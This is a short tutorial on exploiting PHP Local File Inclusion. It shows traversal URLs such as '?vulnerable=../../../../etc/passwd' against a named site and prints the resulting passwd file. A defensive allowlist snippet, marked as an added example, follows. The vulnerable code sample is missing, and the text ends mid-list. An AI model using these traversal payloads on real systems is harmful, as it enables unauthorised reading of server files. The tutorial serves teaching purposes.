Exploiting Local File Inclusion (LFI) vulnerability

Local File Inclusion (LFI) means getting a PHP web page to load a local file such as /etc/passwd or /etc/hosts. Several programming mistakes can cause this vulnerability. It occurs when a programmer uses one of the following functions unsafely in a PHP page:

include
include_once
require
require_once
fopen

For example, suppose a page contains:

This code is vulnerable to Local File Inclusion.

Suppose our target URL is www.n00bprogammer.com/vulnerable/

If you submit this URL directly in the browser address bar, you get a web page. That means there is a file “index.php”.

If we try:

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And the output is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That means it worked. But modern Unix-like systems no longer store the password hashes in /etc/passwd (all hashes are in /etc/shadow), so without permission you can't read the /etc/shadow file.
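
The defensive counterpart to the traversal shown above, as an added example that is not code from the original post: the request value is only ever used as a key into a fixed allowlist, and the resolved path is checked to stay inside one directory. The parameter name `vulnerable` comes from the URLs above; the `pages` directory, the page names and the helper `resolve_page` are assumptions.

```php
<?php
// Added example, not from the original post. The directory, page names and
// function name are assumptions made for illustration.
// Unsafe pattern this replaces (assumed): include $_GET['vulnerable'];

// Directory that holds the only files this script may include (assumed).
const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file name inside PAGE_DIR (constructed names).
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Map a request value to a file path that is safe to include.
 * Returns null when the value is not allowlisted or resolves outside PAGE_DIR.
 */
function resolve_page($requested): ?string
{
    // Reject arrays (?vulnerable[]=x) and anything that is not an exact key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    // Defence in depth: resolve symlinks and ".." and confirm containment.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file is missing
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved path escaped PAGE_DIR
    }
    return $path;
}

$file = resolve_page($_GET['vulnerable'] ?? 'home');
if ($file === null) {
    // "../../../../etc/passwd" ends up here: it is not a key in PAGES.
    http_response_code(404);
    exit('Page not found');
}
include $file;
```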

There are many files you may be interested in reading: